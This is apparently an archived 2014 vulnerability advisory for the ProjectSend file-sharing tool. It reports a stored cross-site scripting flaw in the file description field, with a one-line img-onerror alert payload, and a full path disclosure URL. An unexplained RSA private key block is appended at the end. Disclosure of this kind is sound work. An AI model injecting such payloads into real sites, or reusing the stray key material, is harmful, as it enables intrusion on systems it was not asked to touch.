ProjectSend version r561 Ultimate suffers from cross site scripting and path disclosure vulnerabilities.
f914ac1aa8fc5e724fe7cbdabea5e45d01a153211b858cd9a295349ee69dc04e
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: ProjectSend - Cross Site Scripting & Full Path Disclosure Vulnerability's
# Date: 19/12/2014
# Url Vendor: http://www.projectsend.org/
# Vendor Name: ProjectSend
# Version: r561 Ultimate Version
# CVE: CVE-2014-1155
# Author: TaurusOmar
# Tiwtte: @TaurusOmar_
# Email: taurusomar13@gmail.com
# Home: overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: Medium
Description
ProjectSend is a client-oriented file uploading utility. Clients are created and assigned a username and a password. Files can then be uploaded under each account with the ability to add a title and description to each.When a client logs in from any browser anywhere, the client will see a page that contains your company logo, and a sortable list of every file uploaded under the client's name, with description, time, date, etc.. It also works as a history of "sent" files, provides a differences between revisions, the time that it took between each revision, and so on.
------------------------
+ CROSS SITE SCRIPTING +
------------------------
# Exploiting Description - Get into code xss in the box of image description.
<textarea placeholder="Optionally, enter here a description for the file." name="file[1][description]">DESCRIPTION</textarea>
#P0c
"><img src=x onerror=;;alert('XSS') />
<textarea placeholder="Optionally, enter here a description for the file." name="file[1][description]">CODE XSS</textarea>
#Proof Concept
http://i.imgur.com/FOPIvd4.jpg
------------------------
+ FULL PATH DISCLOSURE +
------------------------
# Exploiting Description - The url disclosure directory of platform.
#P0c
http://site.com/projectsend/templates/pinboxes/template.php
#Proof Concept
http://i.imgur.com/xfN4kDV.jpg
-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl
Mq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi
2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB
AoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8
GaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX
X5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/
WyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R
8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL
Wvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM
8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM
BVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY
ZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J
X54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/
-----END RSA PRIVATE KEY-----